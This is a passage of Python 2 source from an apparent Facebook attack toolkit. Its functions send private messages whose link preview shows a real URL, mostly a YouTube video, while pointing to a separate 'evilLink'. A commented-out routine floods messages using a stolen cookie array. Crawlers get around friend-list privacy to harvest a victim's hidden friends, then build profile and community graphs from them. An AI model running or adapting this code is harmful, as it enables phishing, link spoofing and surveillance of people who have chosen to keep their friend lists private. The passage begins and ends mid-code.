'attachment[params][video][0][width]' : '1920',
'attachment[params][video][0][height]' : '1080',
'attachment[params][video][0][safe]' : '1',
'attachment[type]' : '100',
'link_metrics[source]' : 'ShareStageExternal',
'link_metrics[domain]' : 'www.youtube.com',
'link_metrics[base_domain]' : 'youtube.com',
'link_metrics[title_len]' : str(len(title)),
'link_metrics[summary_len]' : str(len(summary)),
'link_metrics[min_dimensions][0]' : '62',
'link_metrics[min_dimensions][1]' : '62',
'link_metrics[images_with_dimensions]' : '1',
'link_metrics[images_pending]' : '0',
'link_metrics[images_fetched]' : '0',
'link_metrics[image_dimensions][0]' : '1920',
'link_metrics[image_dimensions][1]' : '1080',
'link_metrics[images_selected]' : '1',
'link_metrics[images_considered]' : '1',
'link_metrics[images_cap]' : '10',
'link_metrics[images_type]' : 'images_array',
'composer_metrics[best_image_w]' : '154',
'composer_metrics[best_image_h]' : '154',
'composer_metrics[image_selected]' : '0',
'composer_metrics[images_provided]' : '1',
'composer_metrics[images_loaded]' : '1',
'composer_metrics[images_shown]' : '1',
'composer_metrics[load_duration]' : '1184',
'composer_metrics[timed_out]' : '0',
'composer_metrics[sort_order]' : '',
'composer_metrics[selector_type]' : 'UIThumbPager_6',
'backdated_date[year]' : '',
'backdated_date[month]' : '',
'backdated_date[day]' : '',
'backdated_date[hour]' : '',
'backdated_date[minute]' : '',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1399663185',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][value]' : str(privacy),
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8ajEAMBlynzpQ9UoGya4Cq7pEsx6iWF29aGEZ94WpUpBxCFaG',
'__req' : 'g',
'ttstamp' : '265817289113541097355755354',
'__rev' : '1241763',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos)
if globalLogging:
logs(response.read())
except:
logs('Error en el modulo de linkPreviewYoutube()')
print 'Error en el modulo de linkPreviewYoutube()\n'
#########################################
#Vulnerability no longer available
#########################################
#def mailFlood(victim,message):
# for cookies in cookieArray:
# print cookies
# cj._cookies = cookies
# c_user = getC_user()
# print str(c_user)+'\n'
# try:
# set_dtsg()
# arguments = {
# 'message_batch[0][action_type]' : 'ma-type:user-generated-message',
# 'message_batch[0][thread_id]' : '',
# 'message_batch[0][author]' : 'fbid:'+str(c_user),
# 'message_batch[0][author_email]' : '',
# 'message_batch[0][coordinates]' : '',
# 'message_batch[0][timestamp]' : '1372638156169',
# 'message_batch[0][timestamp_absolute]' : 'Hoy',
# 'message_batch[0][timestamp_relative]' : '21:22',
# 'message_batch[0][timestamp_time_passed]' : '0',
# 'message_batch[0][is_unread]' : 'false',
# 'message_batch[0][is_cleared]' : 'false',
# 'message_batch[0][is_forward]' : 'false',
# 'message_batch[0][is_filtered_content]' : 'false',
# 'message_batch[0][spoof_warning]' : 'false',
# 'message_batch[0][source]' : 'source:titan:web',
# 'message_batch[0][body]' : str(message),
# 'message_batch[0][has_attachment]' : 'false',
# 'message_batch[0][html_body]' : 'false',
# 'message_batch[0][specific_to_list][0]' : 'email:'+str(victim),
# 'message_batch[0][specific_to_list][1]' : 'fbid:'+str(c_user),
# 'message_batch[0][forward_count]' : '0',
# 'message_batch[0][force_sms]' : 'true',
# 'message_batch[0][ui_push_phase]' : 'V3',
# 'message_batch[0][status]' : '0',
# 'message_batch[0][message_id]' : '<1372638156169:4202807677-4247395496@mail.projektitan.com>',
# 'message_batch[0][client_thread_id]' : 'pending:pending',
# 'client' : 'web_messenger',
# '__user' : str(c_user),
# '__a' : '1',
# '__dyn' : '7n8ahyj35zsyzk9UmAEKWw',
# '__req' : 'b',
# 'fb_dtsg' : br.form['fb_dtsg'],
# 'phstamp' : '16581661207177118751248'
# }
#
# datos = urlencode(arguments)
# response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php ',datos)
#
# if globalLogging:
# logs(response.read())
#
# except mechanize.HTTPError as e:
# print e.code
# except mechanize.URLError as e:
# print e.reason.args
# except:
# print 'Ctrl+c SIGNAL Caught\n'
# return
def getTime():
hour = datetime.datetime.strftime(datetime.datetime.now(), '%H:%M')
if int(hour.split(':')[0]) >= 12:
hour += 'am'
else:
hour += 'pm'
return hour
def privateMessageLink(message,victim,subject,realLink,title,summary,imageLink,evilLink):
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][thread_id]' : '',
'message_batch[0][author]' : 'fbid:'+c_user,
'message_batch[0][author_email]' : '',
'message_batch[0][timestamp]' : str(int(time())),
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : getTime(),
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_cleared]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][is_spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : message,
'message_batch[0][has_attachment]' : 'true',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:' + victim,
'message_batch[0][content_attachment][subject]' : subject,
'message_batch[0][content_attachment][app_id]' : '2309869772',
'message_batch[0][content_attachment][attachment][params][urlInfo][canonical]' : realLink,
'message_batch[0][content_attachment][attachment][params][urlInfo][final]' : realLink,
'message_batch[0][content_attachment][attachment][params][urlInfo][user]' : evilLink,
'message_batch[0][content_attachment][attachment][params][favicon]' : realLink+'/favicon.ico',
'message_batch[0][content_attachment][attachment][params][title]' : title,
'message_batch[0][content_attachment][attachment][params][summary]' : summary,
'message_batch[0][content_attachment][attachment][params][images][0]' : imageLink,
'message_batch[0][content_attachment][attachment][params][medium]' : '106',
'message_batch[0][content_attachment][attachment][params][url]' : realLink,
'message_batch[0][content_attachment][attachment][type]' : '100',
'message_batch[0][content_attachment][link_metrics][source]' : 'ShareStageExternal',
'message_batch[0][content_attachment][link_metrics][domain]' : realLink.strip('https://').strip('/'),
'message_batch[0][content_attachment][link_metrics][base_domain]' : realLink.strip('https://www.').strip('/'),
'message_batch[0][content_attachment][link_metrics][title_len]' : '38',
'message_batch[0][content_attachment][link_metrics][summary_len]' : '38',
'message_batch[0][content_attachment][link_metrics][min_dimensions][0]' : '70',
'message_batch[0][content_attachment][link_metrics][min_dimensions][1]' : '70',
'message_batch[0][content_attachment][link_metrics][images_with_dimensions]' : '3',
'message_batch[0][content_attachment][link_metrics][images_pending]' : '0',
'message_batch[0][content_attachment][link_metrics][images_fetched]' : '0',
'message_batch[0][content_attachment][link_metrics][image_dimensions][0]' : '322',
'message_batch[0][content_attachment][link_metrics][image_dimensions][1]' : '70',
'message_batch[0][content_attachment][link_metrics][images_selected]' : '1',
'message_batch[0][content_attachment][link_metrics][images_considered]' : '5',
'message_batch[0][content_attachment][link_metrics][images_cap]' : '3',
'message_batch[0][content_attachment][link_metrics][images_type]' : 'ranked',
'message_batch[0][content_attachment][composer_metrics][best_image_w]' : '100',
'message_batch[0][content_attachment][composer_metrics][best_image_h]' : '100',
'message_batch[0][content_attachment][composer_metrics][image_selected]' : '0',
'message_batch[0][content_attachment][composer_metrics][images_provided]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_loaded]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_shown]' : '1',
'message_batch[0][content_attachment][composer_metrics][load_duration]' : '6',
'message_batch[0][content_attachment][composer_metrics][timed_out]' : '0',
'message_batch[0][content_attachment][composer_metrics][sort_order]' : '',
'message_batch[0][content_attachment][composer_metrics][selector_type]' : 'UIThumbPager_6',
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1394766424499:3126670212-4125121119@mail.projektitan.com>',
'message_batch[0][client_thread_id]' : 'user:'+str(c_user),
'client' : 'web_messenger',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8a9EAMBlCFYwyt2u6aOGeExEW9J6yUgByVbGAF4iGGeqheCu6po',
'__req' : '1n',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '26581658074898653',
'__rev' : '1161243'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Ctrl+c SIGNAL Caught\n'
return
def privateMessagePhishing(victimId,message,subject,evilLink,videoLink,title,summary,videoID,hijackedVideo):
c_user = getC_user()
print str(c_user)+'\n'
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][thread_id]' : '',
'message_batch[0][author]' : 'fbid:'+str(c_user),
'message_batch[0][author_email]' : '',
'message_batch[0][coordinates]' : '',
'message_batch[0][timestamp]' : '1410457740680',
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : '10:16am',
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_cleared]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : str(message),
'message_batch[0][has_attachment]' : 'true',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:'+str(victimId),
'message_batch[0][specific_to_list][1]' : 'fbid:'+str(c_user),
'message_batch[0][content_attachment][subject]' : str(subject),
'message_batch[0][content_attachment][app_id]' : '2309869772',
'message_batch[0][content_attachment][attachment][params][urlInfo][canonical]' : str(videoLink),
'message_batch[0][content_attachment][attachment][params][urlInfo][final]' : str(videoLink),
'message_batch[0][content_attachment][attachment][params][urlInfo][user]' : str(evilLink),
'message_batch[0][content_attachment][attachment][params][urlInfo][log][1408344793]' : 'https://www.mkit.com.ar/',
'message_batch[0][content_attachment][attachment][params][favicon]' : 'http://s.ytimg.com/yts/img/favicon_32-vflWoMFGx.png',
'message_batch[0][content_attachment][attachment][params][title]' : str(title),
'message_batch[0][content_attachment][attachment][params][summary]' : str(summary),
'message_batch[0][content_attachment][attachment][params][images][0]' : 'http://i1.ytimg.com/vi/'+videoID+'/mqdefault.jpg?feature=og&cfs=1&upscale',
'message_batch[0][content_attachment][attachment][params][medium]' : '103',
'message_batch[0][content_attachment][attachment][params][url]' : str(videoLink),
'message_batch[0][content_attachment][attachment][params][video][0][type]' : 'application/x-shockwave-flash',
'message_batch[0][content_attachment][attachment][params][video][0][src]' : 'http://www.youtube.com/v/'+str(hijackedVideo)+'?version=3&autohide=1&autoplay=1',
'message_batch[0][content_attachment][attachment][params][video][0][width]' : '1280',
'message_batch[0][content_attachment][attachment][params][video][0][height]' : '720',
'message_batch[0][content_attachment][attachment][params][video][0][secure_url]' : 'https://www.youtube.com/v/'+str(hijackedVideo)+'?version=3&autohide=1&autoplay=1',
'message_batch[0][content_attachment][attachment][type]' : '100',
'message_batch[0][content_attachment][link_metrics][source]' : 'ShareStageExternal',
'message_batch[0][content_attachment][link_metrics][domain]' : 'www.youtube.com',
'message_batch[0][content_attachment][link_metrics][base_domain]' : 'youtube.com',
'message_batch[0][content_attachment][link_metrics][title_len]' : str(len(title)),
'message_batch[0][content_attachment][link_metrics][summary_len]' : str(len(summary)),
'message_batch[0][content_attachment][link_metrics][min_dimensions][0]' : '70',
'message_batch[0][content_attachment][link_metrics][min_dimensions][1]' : '70',
'message_batch[0][content_attachment][link_metrics][images_with_dimensions]' : '1',
'message_batch[0][content_attachment][link_metrics][images_pending]' : '0',
'message_batch[0][content_attachment][link_metrics][images_fetched]' : '0',
'message_batch[0][content_attachment][link_metrics][image_dimensions][0]' : '1280',
'message_batch[0][content_attachment][link_metrics][image_dimensions][1]' : '720',
'message_batch[0][content_attachment][link_metrics][images_selected]' : '1',
'message_batch[0][content_attachment][link_metrics][images_considered]' : '1',
'message_batch[0][content_attachment][link_metrics][images_cap]' : '10',
'message_batch[0][content_attachment][link_metrics][images_type]' : 'images_array',
'message_batch[0][content_attachment][composer_metrics][best_image_w]' : '100',
'message_batch[0][content_attachment][composer_metrics][best_image_h]' : '100',
'message_batch[0][content_attachment][composer_metrics][image_selected]' : '0',
'message_batch[0][content_attachment][composer_metrics][images_provided]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_loaded]' : '1',
'message_batch[0][content_attachment][composer_metrics][images_shown]' : '1',
'message_batch[0][content_attachment][composer_metrics][load_duration]' : '2',
'message_batch[0][content_attachment][composer_metrics][timed_out]' : '0',
'message_batch[0][content_attachment][composer_metrics][sort_order]' : '',
'message_batch[0][content_attachment][composer_metrics][selector_type]' : 'UIThumbPager_6',
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1410457740680:1367750931-713286099@mail.projektitan.com>',
'message_batch[0][client_thread_id]' : 'user:'+str(victimId),
'client' : 'web_messenger',
'__user' : str(c_user),
'__a' : '1',
'__dyn' : '7n8ahyj35CCOadgDxqjdLg',
'__req' : 'c',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '265816977807275100848411568',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php ',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Ctrl+c SIGNAL Caught\n'
return
def linkFriends(victim):
    """Resolve each harvested friend id of *victim* via the Graph API.

    Reads dumps/<victim>/<victim>.txt (one user id per line, produced by
    the friendship-bypass modules), queries https://graph.facebook.com/<id>
    for each, prints a profile summary and writes an HTML-formatted line
    (via MyParser.htmlFormat) to dumps/<victim>/<victim>friend_links.html.
    On HTTP/URL errors it sleeps with a linearly growing delay and retries
    the next entry.  Returns None.
    """
    friends = []
    root = 'dumps'
    directory = victim
    delay = 1  # back-off delay in seconds, incremented on each network error
    linkedFile = open( os.path.join(root,directory,victim+"friend_links.html"),"wb")
    try:
        persons = open( os.path.join(root,directory,victim+".txt") ,"rb")
    except:
        print '\r                                                                   \r',
        print '\r %s.txt not exists, error on linkFriends module \r' %victim,
        logs(str(victim)+' not exists, error on linkFriends module')
        return
    # Load every stored friend id, stripping line terminators.
    while True:
        linea = persons.readline()
        if not linea:
            break
        friends.append(linea.strip("\n\r"))
    persons.close()
    for individuals in friends:
        try:
            response = br.open('https://graph.facebook.com/'+individuals)
            resultado = response.read()
            json_dump = json.loads(resultado)
            try:
                # Full public profile available: link, name, gender, locale.
                friend = json_dump['link']+' '+json_dump['name']+' '+json_dump['gender']+ ' '+ json_dump['locale']
                print friend
                linkedFile.write(MyParser.htmlFormat(json_dump))
            except:
                # 'link' missing: fall back to username, then to the raw id.
                try:
                    print 'https://www.facebook.com/%s' %json_dump['username']+' '+json_dump['name']+' '+json_dump['gender']+ ' '+ json_dump['locale']
                except:
                    print 'https://www.facebook.com/%s' %individuals
        except mechanize.HTTPError as e:
            print e.code
            print 'Sleeping %d' %delay
            sleep(delay)
            delay += 1
        except mechanize.URLError as e:
            print e.reason.args
            print 'Sleeping %d URLerror ' %delay
            sleep(delay)
            delay += 1
    linkedFile.close()
def getName(userId):
    """Scrape the display name for *userId* from the profile page.

    Searches the HTML for the "_8_2" marker and extracts the text between
    a fixed offset (match end + 33 — presumably skips markup up to the
    name; TODO confirm against current page layout) and the next '">'.
    Falls back to returning *userId* unchanged on any error or when the
    marker is absent.
    """
    try:
        response = br.open('https://www.facebook.com/'+str(userId))
        data = response.read()
        match = re.search("_8_2",data)
        if match is not None:
            start = match.end() + 33
            matchBis = re.search('">',data[start:])
            if matchBis is not None:
                return data[start:start+matchBis.start()]
        return userId
    except mechanize.HTTPError as e:
        print str(e.code)
        return userId
    except mechanize.URLError as e:
        print str(e.reason.args)
        return userId
    except:
        return userId
def mkdir(directory,root):
    """Create root/directory (and intermediate dirs) if it does not exist.

    No-op when the directory is already present.
    """
    import os  # kept local to mirror the original's scoping
    path = os.path.join(root, directory)
    # Straight guard instead of the original's inverted exists/return shape.
    if not os.path.exists(path):
        os.makedirs(path)
def saveObjects(victim,matrix,ref):
    """Persist the adjacency matrix and node-reference map for *victim*.

    Writes two pickles under dumps/<victim>/objects/: "<victim>" holds
    *matrix* and "<victim>.ref" holds *ref* (the id -> node mapping).
    The directory must already exist (see mkdir()).
    """
    path = os.path.join("dumps",victim,"objects",victim)
    # 'with' closes each handle even if pickling raises; the original
    # leaked both handles on an exception between open() and close().
    with open(path,"wb") as f:
        pickle.dump(matrix,f)
    with open(path+'.ref',"wb") as g:
        pickle.dump(ref,g)
def loadObjects(victim):
    """Load the pickled adjacency matrix and reference map for *victim*.

    Counterpart of saveObjects().  Returns (matrix, ref).  On any failure
    (missing files, corrupt pickle) returns ([], {}) so callers can treat
    it as "nothing saved yet".
    """
    path = os.path.join("dumps",victim,"objects",victim)
    try:
        # 'with' guarantees the first handle is closed even when opening
        # or unpickling the second file fails (the original leaked it).
        with open(path,"rb") as f:
            A = pickle.load(f)
        with open(path+'.ref',"rb") as g:
            ref = pickle.load(g)
        return A,ref
    except:
        # Preserve the original best-effort contract: any error means
        # "no saved state".
        return [],{}
def reAnalyzeGraph(victim):
    """Re-run community detection on a previously saved labeled graph.

    Loads the pickled graph written by analyzeGraph() from
    dumps/<victim>/objects/<victim>-community, partitions it with the
    python-louvain 'community' module, and for each community prints its
    members/edges and saves a spring-layout plot (.pdf/.png/.dot) under
    dumps/<victim>/.  Pauses for user input after each community.
    Returns None; failures are logged and reported, never raised.
    """
    try:
        f = open( os.path.join("dumps",victim,"objects",victim+"-community" ) ,"rb")
        labelGraph = pickle.load(f)
        f.close()
    except:
        logs('Error on reAnalyzeGraph() object not exist')
        print 'Error on reAnalyzeGraph() object not exist\n'
        return
    #Community algorithm
    root = 'dumps'
    directory = victim
    try:
        partition = community.best_partition(labelGraph)
        for i in set(partition.values()):
            print "Community", i
            # All nodes assigned to community i by the Louvain partition.
            members = [nodes for nodes in partition.keys() if partition[nodes] == i]
            egonet = labelGraph.subgraph(set(members))
            print sorted(egonet.nodes(),reverse=False)
            print sorted(egonet.edges(),reverse=False)
            nx.draw_spring(egonet,node_color = np.linspace(0,1,len(egonet.nodes())),edge_color = '#000000' ,with_labels=True)
            plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".pdf") )
            plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".png") )
            write_dot(egonet, os.path.join(root,directory,victim+"Community"+str(i)+".dot") )
            plt.show()
            raw_input('Press enter to continue...\n')
    except:
        logs('Error on reAnalyzeGraph() debbug for more information')
        print 'Error on reAnalyzeGraph() debbug for more information\n'
        return
def analyzeGraph(victim):
    """Full analysis pass over the saved friendship graph of *victim*.

    Loads the adjacency matrix + id map saved by the bypass modules,
    resolves each id to a display name (getName) and common pages
    (corePagesLike), writes a references file, prints degree/connectivity
    statistics, builds a name-labeled graph, plots and pickles it, then
    runs Louvain community detection and plots each community.
    Heavy on network and matplotlib side effects; returns None.
    """
    root = 'dumps'
    directory = victim
    mkdir(directory,root)
    edges = {}
    edgesValues = {}
    nodekeys = {}
    userNames = []
    commonPages = {}
    A,idkeys = loadObjects(victim)
    if A != []:
        myGraph = nx.from_numpy_matrix(A)
        nodes = myGraph.nodes()
        #Percentage
        i = 0.0
        percentage = 0.0
        #flush
        print '\r                                                                   \r',
        #Dictio creation of usernames
        #Associated with node number
        print 'Attemping to get user\'s information'
        # Map each node number to a resolved user name; network errors on a
        # single user are skipped.
        for elements in idkeys.keys():
            try:
                user = getName(elements)
                commonPages[user] = corePagesLike(victim,elements)
                userNames.append(user)
                nodekeys[idkeys[elements]] = user
                percentage = (i * 100.0)/len(idkeys.keys())
                flush()
                print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(idkeys.keys()), percentage),
                i+=1
            except:
                continue
        # Persist "name : node-number" pairs for later cross-reference.
        reference = open( os.path.join(root,directory,victim+"references.txt") ,"wb")
        for users in nodekeys.keys():
            try:
                line = str(nodekeys[users])+' : '+str(users)
                reference.write(line + '\n')
            except:
                continue
        reference.close()
        # Bucket nodes by degree: edgesValues[degree] -> [node, ...].
        for node in nodes:
            try:
                edges[node] = myGraph.degree(node)
                if edgesValues.has_key(edges[node]):
                    edgesValues[edges[node]].append(node)
                else:
                    edgesValues[edges[node]] = [node]
            except:
                continue
        for values in sorted(edgesValues.keys(),reverse=True):
            try:
                print str(values) + ' aristas; nodos: ',
                for nodes in edgesValues[values]:
                    print str(nodes) + ', ',
                print '\n'
            except:
                continue
        print nx.is_connected(myGraph)
        print nx.number_connected_components(myGraph)
        ccs = nx.clustering(myGraph)
        print ccs
        print sum(ccs)/len(ccs)
        #Creation of the labeld graph for community
        labelNodes = myGraph.nodes()
        labelEdges = myGraph.edges()
        labelGraph = nx.Graph()
        # Rebuild the graph keyed by user names, attaching liked pages as a
        # node attribute; unresolved nodes are silently dropped.
        for label in labelNodes:
            try:
                labelGraph.add_node(nodekeys[int(label)],likes=commonPages[nodekeys[int(label)]])
            except:
                continue
        for labelE in labelEdges:
            try:
                labelGraph.add_edge(nodekeys[int(labelE[0])],nodekeys[int(labelE[1])])
            except:
                continue
        try:
            nx.draw_spring(labelGraph,node_color = np.linspace(0,1,len(labelGraph.nodes())),edge_color = np.linspace(0,1,len(labelGraph.edges())) ,with_labels=True)
            plt.savefig( os.path.join(root,directory,victim+"labelGraph_color.pdf") )
            plt.savefig( os.path.join(root,directory,victim+"labelGraph_color.png") )
            write_dot(labelGraph, os.path.join(root,directory,victim+"labelGraph_color.dot") )
            plt.show()
        except:
            print 'Erro plotting the graph'
        #Saving the object for future analysis
        f = open( os.path.join("dumps",victim,"objects",victim+"-community") ,"wb")
        pickle.dump(labelGraph,f)
        f.close()
        #Community algorithm
        partition = community.best_partition(labelGraph)
        for i in set(partition.values()):
            try:
                print "Community", i
                members = [nodes for nodes in partition.keys() if partition[nodes] == i]
            except:
                continue
            ''' No longer necessary (?)
            reference = open(root+"\\"+directory+"\\community"+str(i)+"references.txt","wb")
            for nodes in members:
                line = str(nodekeys[int(nodes)])+' : '+str(nodes)
                reference.write(line + '\n')
            reference.close()
            '''
            try:
                egonet = labelGraph.subgraph(set(members))
                print sorted(egonet.nodes(),reverse=False)
                print sorted(egonet.edges(),reverse=False)
                nx.draw_spring(egonet,node_color = np.linspace(0,1,len(egonet.nodes())),edge_color = '#000000' ,with_labels=True)
                plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".pdf") )
                plt.savefig( os.path.join(root,directory,victim+"Community"+str(i)+".png") )
                write_dot(egonet, os.path.join(root,directory,victim+"Community"+str(i)+".dot") )
                plt.show()
            except:
                print 'Error plotting the graph'
            raw_input('Press enter to continue...\n')
    else:
        logs('Error on analyzeGraph() file not exist')
        print 'Error on analyzeGraph() file not exist\n'
        return
def bypassFriendshipPrivacyPlot(victim, transitive):
    """Crawl *victim*'s hidden friend list via mutual-friend pages, plotting.

    Same breadth-first crawl as bypassFriendshipPrivacy() — seeded with the
    known friend *transitive* and expanded through coreFriendshipPrivacy()
    — but additionally maintains a networkx graph (node 0 = victim),
    persists the adjacency matrix + id map via saveObjects(), and renders
    spring-layout plots (.pdf/.png/.dot) under dumps/<victim>/.
    Resumable: previously visited ids are reloaded from <victim>.txt.
    Returns None.
    """
    coleccion = {}
    nodeID = 0
    root = 'dumps'
    directory = str(victim)
    mkdir(directory,root)
    myGraph = nx.Graph()
    # Node 0 always represents the victim.
    coleccion[victim] = nodeID
    victima = nodeID
    myGraph.add_node(victima)
    nodeID += 1
    #Percentage container
    percentage = 0.0
    #Disclosude friends container
    friendships = []
    #Already visited nodes container
    visited = []
    try:
        #If the file already exists
        friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"rb")
        #Reads every line of the file
        while True:
            linea = friendshipFile.readline()
            if not linea:
                break
            #Store in the visited array for non repetition
            visited.append(linea.strip("\n\r"))
        friendshipFile.close()
        # A resume requires the matching saved graph; bail out otherwise.
        A,coleccion = loadObjects(victim)
        if A == []:
            logs("Inconsistency, the userid file exists, but has no object associated")
            print "Inconsistency, the userid file exists, but has no object associated"
            return
        else:
            myGraph = nx.from_numpy_matrix(A)
    except:
        #If the file does not exists, creates the file
        friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
        friendshipFile.close()
    try:
        #Generates the first level of the search
        result = coreFriendshipPrivacy(victim,transitive)
    except:
        print 'Check the internet connection please..'
        return
    #Stores non repetitive values in the disclosed friends container
    for individuos in result:
        if individuos not in visited:
            # Allocate (or reuse) node ids for the friend and the seed,
            # then record the edge between them.
            if coleccion.has_key(individuos) == False:
                nodo = nodeID
                nodeID += 1
                coleccion[individuos] = nodo
            else:
                nodo = coleccion[individuos]
            if coleccion.has_key(transitive) == False:
                transitivo = nodeID
                nodeID += 1
                coleccion[transitive] = transitivo
            else:
                transitivo = coleccion[transitive]
            myGraph.add_node(nodo)
            myGraph.add_edge(nodo,transitivo)
            friendships.append(individuos)
    #Counter for percentage calculus purpose
    i = 0.0
    #flush
    print '\r                                                                   \r',
    #For every value in the first disclosed list, repeats until every value has been tryed
    for friends in friendships:
        #Percentage calculus
        percentage = (i * 100.0)/len(friendships)
        flush()
        print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
        i+=1
        #Only if the node wasn't visited
        if friends not in visited:
            #if coreFriendshipPrivacy() fails, an exception is caught. Therefore, state wis still being True.
            #Only if the try passes, the infinite while will end. (For internet error connection problem)
            state = True
            while state == True:
                try:
                    result = coreFriendshipPrivacy(victim,friends)
                    state = False
                except signalCaught as e:
                    state = False
                    print 'Signal Caught handler'
                    print '%s ' %e.args[0]
                    return
                except:
                    logs('Check the internet connection please.. Press enter when it\'s done')
                    print '\r                                                                   \r',
                    raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r'),
            #Stores non repetitive values in the disclosed friends container
            for element in result:
                if element not in friendships:
                    if coleccion.has_key(friends) == False:
                        nodo = nodeID
                        nodeID += 1
                        coleccion[friends] = nodo
                    else:
                        nodo = coleccion[friends]
                    if coleccion.has_key(element) == False:
                        transitivo = nodeID
                        nodeID += 1
                        coleccion[element] = transitivo
                    else:
                        transitivo = coleccion[element]
                    myGraph.add_node(nodo)
                    myGraph.add_edge(nodo,transitivo)
                    friendships.append(element)
            #Stores every single value of friendships list alredy analyzed for non repetitivness
            visited.append(friends)
    #Check if the file exists, if true append, else create and writes
    try:
        friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"ab")
    except:
        friendshipFile = open( os.path.join(root,directory,victim+".txt") ,"wb")
    #Stores every userID for further analyzis
    for friends in friendships:
        if coleccion.has_key(friends) == False:
            transitivo = nodeID
            nodeID += 1
            coleccion[friends] = transitivo
        else:
            transitivo = coleccion[friends]
        myGraph.add_edge(victima,transitivo)
        friendshipFile.write(str(friends)+'\n')
    friendshipFile.close()
    mkdir('objects', os.path.join(root,directory))
    A = nx.adj_matrix(myGraph)
    saveObjects(victim, A, coleccion)
    nx.draw_spring(myGraph,node_color = np.linspace(0,1,len(myGraph.nodes())),edge_color = np.linspace(0,1,len(myGraph.edges())) ,with_labels=True)
    plt.savefig( os.path.join(root,directory,victim+"graph_color.pdf") )
    plt.savefig( os.path.join(root,directory,victim+"graph_color.png") )
    write_dot(myGraph,os.path.join(root,directory,victim+"graph_color.dot"))
    plt.show()
def bypassFriendshipPrivacy(victim, transitive):
    """Crawl *victim*'s hidden friend list through mutual-friend pages.

    Seeded with one known friend (*transitive*), repeatedly calls
    coreFriendshipPrivacy() on every newly disclosed id, breadth-first,
    until no new ids appear.  Discovered ids are appended to
    dumps/<victim>.txt; ids already in that file are skipped, making the
    crawl resumable.  Plot-free variant of bypassFriendshipPrivacyPlot().
    Returns None.
    """
    #Percentage container
    percentage = 0.0
    #Disclosude friends container
    friendships = []
    #Already visited nodes container
    visited = []
    try:
        #If the file already exists
        friendshipFile = open( os.path.join("dumps",victim+".txt") ,"rb")
        #Reads every line of the file
        while True:
            linea = friendshipFile.readline()
            if not linea:
                break
            #Store in the visited array for non repetition
            visited.append(linea.strip("\n\r"))
        friendshipFile.close()
    except:
        #If the file does not exists, creates the file
        friendshipFile = open( os.path.join("dumps",victim+".txt") ,"wb")
        friendshipFile.close()
    try:
        #Generates the first level of the search
        result = coreFriendshipPrivacy(victim,transitive)
    except:
        print '\r                                                                   \r',
        raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r'),
        return
    #Stores non repetitive values in the disclosed friends container
    for individuos in result:
        if individuos not in visited:
            friendships.append(individuos)
    #Counter for percentage calculus purpose
    i = 0.0
    #flush
    print '\r                                                                   \r',
    #For every value in the first disclosed list, repeats until every value has been tryed
    for friends in friendships:
        #Percentage calculus
        percentage = (i * 100.0)/len(friendships)
        flush()
        print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
        i+=1
        #Only if the node wasn't visited
        if friends not in visited:
            #if coreFriendshipPrivacy() fails, an exception is caught. Therefore, state wis still being True.
            #Only if the try passes, the infinite while will end. (For internet error connection problem)
            state = True
            while state == True:
                try:
